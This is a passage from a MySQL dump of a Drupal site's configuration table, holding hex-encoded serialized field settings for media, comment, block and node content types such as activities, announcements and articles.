756279223b733a383a226c616e6775616765223b733a343a2272756279223b7d693a31323b613a323a7b733a353a226c6162656c223b733a31303a2254797065536372697074223b733a383a226c616e6775616765223b733a31303a2274797065736372697074223b7d693a31333b613a323a7b733a353a226c6162656c223b733a333a22584d4c223b733a383a226c616e6775616765223b733a333a22786d6c223b7d7d7d733a31373a22636b656469746f72355f68656164696e67223b613a313a7b733a31363a22656e61626c65645f68656164696e6773223b613a353a7b693a303b733a383a2268656164696e6732223b693a313b733a383a2268656164696e6733223b693a323b733a383a2268656164696e6734223b693a333b733a383a2268656164696e6735223b693a343b733a383a2268656164696e6736223b7d7d733a32313a22636b656469746f72355f696d616765526573697a65223b613a313a7b733a31323a22616c6c6f775f726573697a65223b623a313b7d733a31343a22636b656469746f72355f6c697374223b613a323a7b733a31303a2270726f70657274696573223b613a323a7b733a383a227265766572736564223b623a313b733a31303a227374617274496e646578223b623a313b7d733a31303a226d756c7469426c6f636b223b623a313b7d733a32333a22636b656469746f72355f736f7572636545646974696e67223b613a313a7b733a31323a22616c6c6f7765645f74616773223b613a303a7b7d7d733a31313a226d656469615f6d65646961223b613a313a7b733a32343a22616c6c6f775f766965775f6d6f64655f6f76657272696465223b623a303b7d7d7d733a31323a22696d6167655f75706c6f6164223b613a353a7b733a363a22737461747573223b623a313b733a363a22736368656d65223b733a363a227075626c6963223b733a393a226469726563746f7279223b733a31333a22696e6c696e652d696d61676573223b733a383a226d61785f73697a65223b4e3b733a31343a226d61785f64696d656e73696f6e73223b613a323a7b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d7d),
('', 'field.field.block_content.basic.body', 0x613a31373a7b733a343a2275756964223b733a33363a2230303734636564372d333036392d346538342d386463632d653131303361353630306564223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32343a22626c6f636b5f636f6e74656e742e747970652e6261736963223b693a313b733a33323a226669656c642e73746f726167652e626c6f636b5f636f6e74656e742e626f6479223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22666f657462614d686c4236754c6332626e2d5045537661506b627544576a304d456a705156775169502d6f223b7d733a323a226964223b733a32343a22626c6f636b5f636f6e74656e742e62617369632e626f6479223b733a31303a226669656c645f6e616d65223b733a343a22626f6479223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a353a226261736963223b733a353a226c6162656c223b733a343a22426f6479223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a31353a22646973706c61795f73756d6d617279223b623a303b733a31363a2272657175697265645f73756d6d617279223b623a303b7d733a31303a226669656c645f74797065223b733a31373a22746578745f776974685f73756d6d617279223b7d),
('', 'field.field.comment.comment.comment_body', 0x613a31373a7b733a343a2275756964223b733a33363a2236306536393662392d616566622d343765382d393035392d396261356165383833663237223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32303a22636f6d6d656e742e747970652e636f6d6d656e74223b693a313b733a33343a226669656c642e73746f726167652e636f6d6d656e742e636f6d6d656e745f626f6479223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22546d414b6a4e724a3752523630597071764a715f517145657759655f53384b6432336e3856524371695773223b7d733a323a226964223b733a32383a22636f6d6d656e742e636f6d6d656e742e636f6d6d656e745f626f6479223b733a31303a226669656c645f6e616d65223b733a31323a22636f6d6d656e745f626f6479223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a373a22636f6d6d656e74223b733a353a226c6162656c223b733a373a22436f6d6d656e74223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a393a22746578745f6c6f6e67223b7d),
('', 'field.field.media.audio.field_media_audio_file', 0x613a31373a7b733a343a2275756964223b733a33363a2230623862643232352d633731362d346565312d616461312d653436633231616431616463223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34323a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f617564696f5f66696c65223b693a313b733a31363a226d656469612e747970652e617564696f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22556c5a50496248634c794e71475935627679644354696a47634b446d776e34466f386f595a543835776c6b223b7d733a323a226964223b733a33343a226d656469612e617564696f2e6669656c645f6d656469615f617564696f5f66696c65223b733a31303a226669656c645f6e616d65223b733a32323a226669656c645f6d656469615f617564696f5f66696c65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a31303a22417564696f2066696c65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a363a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31313a226d70332077617620616163223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31373a226465736372697074696f6e5f6669656c64223b623a303b7d733a31303a226669656c645f74797065223b733a343a2266696c65223b7d),
('', 'field.field.media.document.field_media_document', 0x613a31373a7b733a343a2275756964223b733a33363a2230396432623532662d653061392d346334652d396334362d313339336435613666383438223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a323a7b693a303b733a34303a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f646f63756d656e74223b693a313b733a31393a226d656469612e747970652e646f63756d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d733a383a22656e666f72636564223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2244593548744a5478556a465247555f5061593669666f326e68522d6e415a30793073366b4c6d5562763567223b7d733a323a226964223b733a33353a226d656469612e646f63756d656e742e6669656c645f6d656469615f646f63756d656e74223b733a31303a226669656c645f6e616d65223b733a32303a226669656c645f6d656469615f646f63756d656e74223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a383a22446f63756d656e74223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a363a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a39363a227478742072746620646f6320646f637820707074207070747820786c7320786c737820706466206f6466206f6467206f6470206f6473206f647420666f647420666f647320666f647020666f6467206b6579206e756d62657273207061676573223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31373a226465736372697074696f6e5f6669656c64223b623a303b7d733a31303a226669656c645f74797065223b733a343a2266696c65223b7d),
('', 'field.field.media.image.field_media_image', 0x613a31373a7b733a343a2275756964223b733a33363a2266386531383766612d656633302d343732612d613837302d633161653837666665373963223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a323a7b693a303b733a33373a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f696d616765223b693a313b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d733a383a22656e666f72636564223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224847525832316369796e374b2d71384b4d78734b4851764942345348542d413362717a6d4e446e474b7963223b7d733a323a226964223b733a32393a226d656469612e696d6167652e6669656c645f6d656469615f696d616765223b733a31303a226669656c645f6e616d65223b733a31373a226669656c645f6d656469615f696d616765223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a353a22496d616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'field.field.media.remote_video.field_media_oembed_video', 0x613a31373a7b733a343a2275756964223b733a33363a2232303930383663302d323861312d346162312d613432642d616265313964626632623838223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a323a7b693a303b733a34343a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f6f656d6265645f766964656f223b693a313b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22456f344848656e5635695a61745f6b455767725f777964443354677755524d437a77742d37714945796f4d223b7d733a323a226964223b733a34333a226d656469612e72656d6f74655f766964656f2e6669656c645f6d656469615f6f656d6265645f766964656f223b733a31303a226669656c645f6e616d65223b733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a393a22566964656f2055524c223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'field.field.media.video.field_media_video_file', 0x613a31373a7b733a343a2275756964223b733a33363a2239333332623332632d616366642d343662352d393366372d313739613939336437303636223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34323a226669656c642e73746f726167652e6d656469612e6669656c645f6d656469615f766964656f5f66696c65223b693a313b733a31363a226d656469612e747970652e766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22366b4d4d6a6d6b32725f6373475135327149394255614f38725f6f417a4e4c62786c636c616a2d4a6c4451223b7d733a323a226964223b733a33343a226d656469612e766964656f2e6669656c645f6d656469615f766964656f5f66696c65223b733a31303a226669656c645f6e616d65223b733a32323a226669656c645f6d656469615f766964656f5f66696c65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a31303a22566964656f2066696c65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a363a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a333a226d7034223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31373a226465736372697074696f6e5f6669656c64223b623a303b7d733a31303a226669656c645f74797065223b733a343a2266696c65223b7d),
('', 'field.field.node.activities.body', 0x613a31363a7b733a343a2275756964223b733a33363a2231326330363334662d623966632d346234372d393031392d643063303063373234633538223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32333a226669656c642e73746f726167652e6e6f64652e626f6479223b693a313b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a323a226964223b733a32303a226e6f64652e616374697669746965732e626f6479223b733a31303a226669656c645f6e616d65223b733a343a22626f6479223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a343a22426f6479223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a31353a22646973706c61795f73756d6d617279223b623a313b733a31363a2272657175697265645f73756d6d617279223b623a303b7d733a31303a226669656c645f74797065223b733a31373a22746578745f776974685f73756d6d617279223b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'field.field.node.activities.field_activities_description', 0x613a31363a7b733a343a2275756964223b733a33363a2262626635626334652d663635392d346337342d623461322d376564373637613637616361223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34373a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f6465736372697074696f6e223b693a313b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a323a226964223b733a34343a226e6f64652e616374697669746965732e6669656c645f616374697669746965735f6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a32383a226669656c645f616374697669746965735f6465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a32323a22616374697669746965732d6465736372697074696f6e223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a31353a22646973706c61795f73756d6d617279223b623a303b733a31363a2272657175697265645f73756d6d617279223b623a303b7d733a31303a226669656c645f74797065223b733a31373a22746578745f776974685f73756d6d617279223b7d),
('', 'field.field.node.activities.field_activities_download_file', 0x613a31363a7b733a343a2275756964223b733a33363a2233333339313435332d313239342d343033392d613135362d393934646438316532356663223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34393a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b693a313b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d7d733a323a226964223b733a34363a226e6f64652e616374697669746965732e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b733a31303a226669656c645f6e616d65223b733a33303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a32343a22616374697669746965732d646f776e6c6f61642d66696c65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a363a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a31303a2261637469766974696573223b733a31353a2266696c655f657874656e73696f6e73223b733a32353a227478742070646620646f637820707074782070707420646f63223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31373a226465736372697074696f6e5f6669656c64223b623a303b7d733a31303a226669656c645f74797065223b733a343a2266696c65223b7d),
('', 'field.field.node.activities.field_activities_img', 0x613a31373a7b733a343a2275756964223b733a33363a2239653762613162312d383065342d343463312d616534632d353562383962656639666235223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a33393a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f696d67223b693a313b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b693a313b733a353a22696d616765223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a313a7b733a31363a227472616e736c6174696f6e5f73796e63223b613a333a7b733a333a22616c74223b733a333a22616c74223b733a353a227469746c65223b733a353a227469746c65223b733a343a2266696c65223b733a313a2230223b7d7d7d733a323a226964223b733a33363a226e6f64652e616374697669746965732e6669656c645f616374697669746965735f696d67223b733a31303a226669656c645f6e616d65223b733a32303a226669656c645f616374697669746965735f696d67223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a31343a22616374697669746965732d696d67223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a31303a2261637469766974696573223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a303b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'field.field.node.activities.field_activities_post_date', 0x613a31363a7b733a343a2275756964223b733a33363a2238346661366634362d633832662d343837312d386235642d393262393037343531353238223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34353a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f706f73745f64617465223b693a313b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a383a226461746574696d65223b7d7d733a323a226964223b733a34323a226e6f64652e616374697669746965732e6669656c645f616374697669746965735f706f73745f64617465223b733a31303a226669656c645f6e616d65223b733a32363a226669656c645f616374697669746965735f706f73745f64617465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a32303a22616374697669746965732d706f73742d64617465223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a383a226461746574696d65223b7d),
('', 'field.field.node.announcement.body', 0x613a31363a7b733a343a2275756964223b733a33363a2266396463333238632d373636612d343363342d383762622d393364323930613163383163223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32333a226669656c642e73746f726167652e6e6f64652e626f6479223b693a313b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a323a226964223b733a32323a226e6f64652e616e6e6f756e63656d656e742e626f6479223b733a31303a226669656c645f6e616d65223b733a343a22626f6479223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a353a226c6162656c223b733a343a22426f6479223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a31353a22646973706c61795f73756d6d617279223b623a313b733a31363a2272657175697265645f73756d6d617279223b623a303b7d733a31303a226669656c645f74797065223b733a31373a22746578745f776974685f73756d6d617279223b7d),
('', 'field.field.node.announcement.field_announce_post_date', 0x613a31363a7b733a343a2275756964223b733a33363a2238386361376134372d636332302d343666312d616265642d653065326632613931396532223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34333a226669656c642e73746f726167652e6e6f64652e6669656c645f616e6e6f756e63655f706f73745f64617465223b693a313b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a383a226461746574696d65223b7d7d733a323a226964223b733a34323a226e6f64652e616e6e6f756e63656d656e742e6669656c645f616e6e6f756e63655f706f73745f64617465223b733a31303a226669656c645f6e616d65223b733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a353a226c6162656c223b733a31383a22616e6e6f756e63652d706f73742d64617465223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a383a226461746574696d65223b7d),
('', 'field.field.node.announcement.field_description', 0x613a31363a7b733a343a2275756964223b733a33363a2262303635363765312d376165342d343164312d383362382d323032376163613939613062223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a33363a226669656c642e73746f726167652e6e6f64652e6669656c645f6465736372697074696f6e223b693a313b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a323a226964223b733a33353a226e6f64652e616e6e6f756e63656d656e742e6669656c645f6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a31373a226669656c645f6465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a353a226c6162656c223b733a31313a224465736372697074696f6e223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a393a22746578745f6c6f6e67223b7d),
('', 'field.field.node.announcement.field_download_file', 0x613a31363a7b733a343a2275756964223b733a33363a2262643432363731312d653739392d346464332d626534362d363536366234393331386666223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a33383a226669656c642e73746f726167652e6e6f64652e6669656c645f646f776e6c6f61645f66696c65223b693a313b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d7d733a323a226964223b733a33373a226e6f64652e616e6e6f756e63656d656e742e6669656c645f646f776e6c6f61645f66696c65223b733a31303a226669656c645f6e616d65223b733a31393a226669656c645f646f776e6c6f61645f66696c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a353a226c6162656c223b733a31333a22446f776e6c6f61642046696c65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a363a7b733a373a2268616e646c6572223b733a31323a2264656661756c743a66696c65223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a31323a22616e6e6f756e63656d656e74223b733a31353a2266696c655f657874656e73696f6e73223b733a32353a227478742070646620646f637820707074782070707420646f63223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31373a226465736372697074696f6e5f6669656c64223b623a303b7d733a31303a226669656c645f74797065223b733a343a2266696c65223b7d),
('', 'field.field.node.article.body', 0x613a31373a7b733a343a2275756964223b733a33363a2264663739326239332d363631642d346531322d616139372d643338383630623464336163223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a32333a226669656c642e73746f726167652e6e6f64652e626f6479223b693a313b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22496a5a6e4f4c576b31506a713357526732704c53413145526837506f37697a43715f7036557a745a723263223b7d733a323a226964223b733a31373a226e6f64652e61727469636c652e626f6479223b733a31303a226669656c645f6e616d65223b733a343a22626f6479223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a343a22426f6479223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a31353a22646973706c61795f